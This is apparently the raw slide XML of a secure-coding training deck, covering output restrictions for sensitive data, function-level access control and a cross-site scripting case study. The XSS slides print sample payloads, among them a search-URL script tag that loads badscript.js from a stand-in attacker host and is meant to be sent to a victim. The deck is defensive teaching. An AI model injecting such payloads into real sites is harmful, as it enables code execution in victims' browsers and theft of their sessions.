              <a:gd name="connsiteX1" fmla="*/ 930622 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 66975 h 569845"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 569845 h 569845"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 28712 h 590893"/>
              <a:gd name="connsiteX1" fmla="*/ 930622 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 88023 h 590893"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 590893 h 590893"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 8759 h 570940"/>
              <a:gd name="connsiteX1" fmla="*/ 930622 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 68070 h 570940"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 570940 h 570940"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1992588"/>
              <a:gd name="connsiteY0" fmla="*/ 8759 h 570940"/>
              <a:gd name="connsiteX1" fmla="*/ 930622 w 1992588"/>
              <a:gd name="connsiteY1" fmla="*/ 68070 h 570940"/>
              <a:gd name="connsiteX2" fmla="*/ 1992588 w 1992588"/>
              <a:gd name="connsiteY2" fmla="*/ 570940 h 570940"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1992588" h="570940">
                <a:moveTo>
                  <a:pt x="0" y="8759"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115159" y="-7114"/>
                  <a:pt x="549863" y="-8739"/>
                  <a:pt x="930622" y="68070"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1311381" y="144879"/>
                  <a:pt x="1620880" y="316643"/>
                  <a:pt x="1992588" y="570940"/>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0" name="Oval 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADC46001-EB67-4496-8452-4EF67069E860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5238692" y="1421032"/>
            <a:ext cx="2170070" cy="1448662"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:pr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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1294664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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requirements for protecting sensitive data may extend beyond protection from attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compliance may lead you to take extra effort to prevent tasks that would otherwise be acceptable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Medical forms often contain very sensitive data that a patient would only share with a doctor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the doctor printed a copy to the wrong printer, it might expose the patient's information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some estimates claim that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>printing errors account for 15% of all HIPAA breaches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To comply, you must consider scenarios like this one, and implement solutions to prevent needless exposure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proximity printing—Print jobs are automatically sent to the printer physically nearest the sender.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PIN-based printing—Requires entry of a PIN code at the printer to release a pending print job.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You might also restrict other operations that could be used for out-of-channel data sharing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide obstacles to prevent the use of the clipboard (copy and paste) and screen shots.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You might also log common operations that you wouldn't ordinarily log:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When and by whom information is printed, viewed, copied, and so forth.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output Restrictions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2057732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81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications may permit only certain users to perform certain tasks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Permissions applied to users, groups, or roles are used to control access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functions that implement privileged tasks should check that the user is authenticated and authorized to perform the task.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If such checks are missing, then unauthorized users can use those functions, a problem known as Missing Function Level Access Control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a web application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User interface might provide menu options, implemented as links, which load various URLs for different functions, such as "Manage User Accounts."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Based on authentication and authorization checks, the user interface code might hide that menu option from users who aren't administrators. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, the resource at the URL should also be inaccessible to the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An unauthorized user could simply load the page by typing the address directly into the browser's address bar.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function Level Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="575311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82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The Defect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Attacker can inject scripts into web pages viewed by other users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Application accepts input data from a user and dynamically includes it in web page without proper validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The defect might be in client-side code (scripting sources in the web page content) or in server-side code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: Cross-Site Scripting Defect (Slide 1 of 6)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40198717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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1219200"/>
            <a:ext cx="8460150" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>User enters a search term on a website at www.innocentsite.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>User selects the Search button to submit the search term (let's say "kites").</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>JavaScript client-side code constructs a new URL based on the search term the user entered, and navigates to the new URL, which is www.innocentsite.com?q=jazz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Code running on the web server reads the query string (q=jazz), and displays a list of pages on the website that contain the word "jazz."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Then user enters the following text as a search term:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script type='text/javascript'&gt;alert(Hacked!');&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>User submits the search term, and the resulting URL is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.innocentsite.com?q=&lt;script%20type='text/javascript'&gt;alert('Hacked!);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Code running on the web server reads the query string, and displays the search term followed by the text "not found.“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Of course, in this case, if the search term is output exactly as entered:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>It will be interpreted as JavaScript code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>A message box showing the text "Hacked!" will be shown on the client.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: Cross-Site Scripting Defect (Slide 2 of 6)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2608365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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>While this example is harmless, the user might then take advantage of the vulnerability, sending an email to a victim that includes a link such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.innocentsite.com?q=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script%20src="http://attackersite.com/badscript.js"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: Cross-Site Scripting Defect (Slide 3 of 6)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1516397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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The sort of attack just described is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>reflected XSS attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The script is injected immediately into the results sent back from the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>There might be an intermediary step, in what is called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>stored XSS attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>In a stored XSS attack, the attack is indirect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The script is stored somewhere and actually injected later, when users retrieve the data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This type of attack may be a bit sneakier and harder to detect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>It can use any number of storage mechanisms, such as user preferences, caches, application logs, and so forth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: Cross-Site Scripting Defect (Slide 4 of 6)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1563890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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Possible Consequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Enables an attacker to run his own code with all the privileges of the current user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Might enable the attacker to perform other attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>JavaScript in a web page has access to other objects within the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Modify the page's appearance or content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Access the page's cookies (which can be used to impersonate the user).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Use the XMLHttpRequest method to send information obtained from the page's local objects out to another server for collection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Possibly (with the user's permission) call HTML5 APIs to read the user's location, webcam, microphone, and possibly access files on the local file system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The attacker may be able to perform tasks to enable ongoing subsequent access to the user's account. If this happens, it’s known as a persistent XSS attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: Cross-Site Scripting Defect (Slide 5 of 6)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3109057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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Signs That Your Code May Have This Defect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Input submitted to the web application (through the URL query string, web forms, and so forth) is not validated to ensure it contains no malicious content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Output to the browser is not stripped or encoded, and may be subsequently treated as HTML elements or scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Strategies for Correcting the Defect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Common strategies for preventing a cross-site scripting attack are listed here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Validate all user input on the server side and client side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Encode data on output.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Set Content-Security Policy (CSP) in your page's HTTP headers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Sanitize HTML content.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
